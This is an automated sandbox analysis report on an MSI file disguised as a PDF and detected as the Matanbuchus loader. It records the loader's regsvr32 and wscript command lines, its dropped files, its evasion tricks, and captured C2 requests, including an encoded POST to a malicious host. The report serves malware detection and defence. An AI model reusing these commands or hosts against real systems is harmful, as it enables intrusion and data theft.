Edit tour

Windows Analysis Report
SCAN-068589.pdf.msi

Overview

General Information

Sample Name:	SCAN-068589.pdf.msi
Analysis ID:	647225
MD5:	c0ee31bc6536ae8cb7e5d8809676920a
SHA1:	b21482d1072e5cb65488f2c181f38c75d8c80dcd
SHA256:	2d8740ea16e9457a358ebea73ad377ff75f7aa9bdf748f0d801f5a261977eda4
Tags:	msi
Infos:

Detection

Matanbuchus

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Matanbuchus

System process connects to network (likely due to code injection or exploit)

Uses known network protocols on non-standard ports

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Abnormal high CPU Usage

Drops files with a non-matching file extension (content does not match file extension)

Modifies existing windows services

Adds / modifies Windows certificates

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Registers a DLL

PE / OLE file has an invalid certificate

Launches processes in debugging mode, may be used to hinder debugging

Checks for available system drives (often done to infect USB drives)

Creates or modifies windows services

Dropped file seen in connection with other malware

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w7x64

msiexec.exe (PID: 2460 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi" MD5: AC2E7152124CEED36846BD1B6592A00F)

msiexec.exe (PID: 3004 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)

regsvr32.exe (PID: 2948 cmdline: regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1568 cmdline: -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll MD5: 432BE6CF7311062633459EEF6B242FB5)

wscript.exe (PID: 1244 cmdline: wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs MD5: 045451FA238A75305CC26AC982472367)

taskeng.exe (PID: 2840 cmdline: taskeng.exe {4CFB7DD2-D1A8-412D-8316-3EFD3FFEBE4B} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

regsvr32.exe (PID: 2008 cmdline: C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2852 cmdline: -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\AdobeFontPack\main.dll	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
C:\Users\user\AppData\Local\x86\5507.nls	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.regsvr32.exe.6e410000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security

HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: collectiontelemetrysystem.comContent-Length: 563Content-Type: application/x-www-form-urlencodedAccept-Language: en-RUSData Raw: 65 76 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 4d 48 68 78 51 55 5a 4d 64 6b 52 79 52 56 4e 59 64 33 4e 50 64 7a 51 77 52 33 42 6e 62 45 55 31 51 30 51 79 4f 58 70 4f 56 30 64 69 54 30 31 4d 54 31 4e 52 4d 58 64 4c 53 6e 42 6c 59 79 74 4d 53 58 67 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 62 32 74 59 54 6c 46 42 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 4d 6e 68 44 57 6b 64 4d 61 7a 30 69 4c 43 4a 45 55 7a 4a 34 49 6a 6f 69 63 6b 56 45 56 55 30 33 4e 6d 59 69 4c 43 4a 46 54 47 6f 69 4f 69 49 7a 61 6c 63 32 55 57 56 4e 50 53 49 73 49 6b 56 76 4e 69 49 36 49 6a 4a 34 54 30 64 48 54 45 74 49 49 69 77 69 52 6e 52 76 49 6a 6f 69 63 6d 63 39 50 53 49 73 49 6b 78 76 63 79 49 36 57 79 49 76 51 58 6c 46 52 6e 41 79 51 6e 52 70 4e 33 64 34 59 31 64 7a 4e 6c 59 79 54 57 31 33 53 6b 46 56 56 54 4e 56 63 6d 39 50 52 45 6c 4a 56 6e 70 6b 51 54 6c 48 64 6e 56 4e 54 6b 6c 6e 50 54 30 69 58 53 77 69 54 6c 4e 6c 65 55 52 59 49 6a 6f 69 4d 55 4e 6c 55 6b 4e 4b 54 33 6f 69 4c 43 4a 52 4e 6c 67 32 49 6a 6f 69 4d 6e 70 70 4d 6b 70 4a 56 45 64 79 61 54 51 39 49 69 77 69 56 6e 6f 69 4f 69 49 79 56 54 5a 76 53 6e 49 32 52 6d 31 6e 54 45 45 34 64 6b 4e 53 4c 33 68 78 63 57 64 44 4f 44 6c 49 51 30 74 6d 4c 30 70 4d 52 45 78 4c 52 55 6c 4c 4d 48 42 33 61 58 56 72 50 53 49 73 49 6d 4e 43 52 69 49 36 49 6a 4e 36 5a 6c 70 4f 4b 31 42 48 64 6b 4d 72 59 58 63 31 62 6e 5a 32 4d 57 70 52 4b 32 70 76 50 53 49 73 49 6d 59 78 5a 47 45 69 4f 69 4a 34 61 57 6b 78 55 46 70 58 4b 33 4a 56 52 47 35 33 5a 7a 30 39 49 69 77 69 64 46 63 69 4f 69 4a 78 61 30 78 47 55 6b 39 51 5a 69 49 73 49 6e 64 51 4e 69 49 36 49 6a 64 46 57 47 46 53 5a 6d 35 69 49 69 77 69 65 6d 74 44 4e 79 49 36 49 69 4a 39 Data Ascii: ev=eyIzQ0VrIjoiMHhxQUZMdkRyRVNYd3NPdzQwR3BnbEU1Q0QyOXpOV0diT01MT1NRMXdLSnBlYytMSXgwPSIsIjNmZTExIjoib2tYTlFBPT0iLCIzbTd4IjoiMnhDWkdMaz0iLCJEUzJ4IjoickVEVU03NmYiLCJFTGoiOiIzalc2UWVNPSIsIkVvNiI6IjJ4T0dHTEtIIiwiRnRvIjoicmc9PSIsIkxvcyI6WyIvQXlFRnAyQnRpN3d4Y1dzNlYyTW13SkFVVTNVcm9PRElJVnpkQTlHdnVNTklnPT0iXSwiTlNleURYIjoiMUNlUkNKT3oiLCJRNlg2IjoiMnppMkpJVEdyaTQ9IiwiVnoiOiIyVTZvSnI2Rm1nTEE4dkNSL3hxcWdDODlIQ0tmL0pMRExLRUlLMHB3aXVrPSIsImNCRiI6IjN6ZlpOK1BHdkMrYXc1bnZ2MWpRK2pvPSIsImYxZGEiOiJ4aWkxUFpXK3JVRG53Zz09IiwidFciOiJxa0xGUk9QZiIsIndQNiI6IjdFWGFSZm5iIiwiemtDNyI6IiJ9

Source: unknown

DNS traffic detected: queries for: telemetrysystemcollection.com

Source: global traffic	HTTP traffic detected: GET /m8YYdu/mCQ2U9/auth.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16)Host: telemetrysystemcollection.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 213.226.114.15:443 -> 192.168.2.22:49180 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\68bd58.ipi

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\68bd57.msi

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E465E60	12_2_6E465E60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E458C50	12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E45FDC5	12_2_6E45FDC5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4585F0	12_2_6E4585F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4662FA	12_2_6E4662FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E45E2BD	12_2_6E45E2BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4690BC	12_2_6E4690BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4691DC	12_2_6E4691DC

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: String function: 6E45ADD0 appears 35 times

Source: C:\Windows\System32\msiexec.exe

Process Stats: CPU usage > 98%

Source: SCAN-068589.pdf.msi

Static PE information: invalid certificate

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\x86\5507.nls F8CC2CF36E193774F13C9C5F23AB777496DCD7CA588F4F73B45A7A5FFA96145E

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4CFB7DD2-D1A8-412D-8316-3EFD3FFEBE4B} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\AdobeFontPack

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\~DF6CBE8E5B62F6E221.TMP

Jump to behavior

Source: classification engine

Classification label: mal64.troj.evad.winMSI@13/12@9/1

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Yara detected Matanbuchus

Source: Yara match	File source: 12.2.regsvr32.exe.6e410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeFontPack\main.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\x86\5507.nls, type: DROPPED

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Users\user\AppData\Local\x86\5507.nls

Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\AdobeFontPack\main.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe	File created: C:\Users\user\AppData\Local\x86\5507.nls			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\SystemRestore

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\VssapiPublisher

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 48195
Source: unknown	Network traffic detected: HTTP traffic on port 48195 -> 49190

Source: C:\Windows\System32\msiexec.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_12-14796
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep			graph_12-14736

Source: C:\Windows\System32\msiexec.exe TID: 568	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2104	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2716	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2384	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1056	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Last function: Thread delayed

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 12_2_6E462F53 FindFirstFileExW,

12_2_6E462F53

Source: C:\Windows\SysWOW64\regsvr32.exe

Thread delayed: delay time: 80000

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

API call chain: ExitProcess graph end node

graph_12-14803

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: regsvr32.exe, 00000007.00000003.1133918738.0000000003CE0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1146769824.0000000003849000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1115719703.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1145675785.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1138782009.0000000003DA0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: zyjF6yeosi3Z3BbszxHZ5k7PONzRIIxJBPMbNo3u0Vg2zQeMu4Rk8CfGv3TUFN4O

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6E45D490

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 12_2_6E463FE0 GetProcessHeap,

12_2_6E463FE0

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E457CAA mov eax, dword ptr fs:[00000030h]	12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h]	12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h]	12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h]	12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E416570 mov ecx, dword ptr fs:[00000030h]	12_2_6E416570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov ecx, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h]	12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41DF70 mov edx, dword ptr fs:[00000030h]	12_2_6E41DF70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E45EFD5 mov eax, dword ptr fs:[00000030h]	12_2_6E45EFD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E458C50 mov eax, dword ptr fs:[00000030h]	12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E458C50 mov ecx, dword ptr fs:[00000030h]	12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41ECD0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41ECD0 mov eax, dword ptr fs:[00000030h]	12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41ECD0 mov eax, dword ptr fs:[00000030h]	12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E415580 mov eax, dword ptr fs:[00000030h]	12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h]	12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h]	12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h]	12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h]	12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov edx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov edx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h]	12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E462B7D mov eax, dword ptr fs:[00000030h]	12_2_6E462B7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h]	12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h]	12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h]	12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov eax, dword ptr fs:[00000030h]	12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_6E418300 mov eax, dword ptr fs:[00000030h]	12_2_6E418300
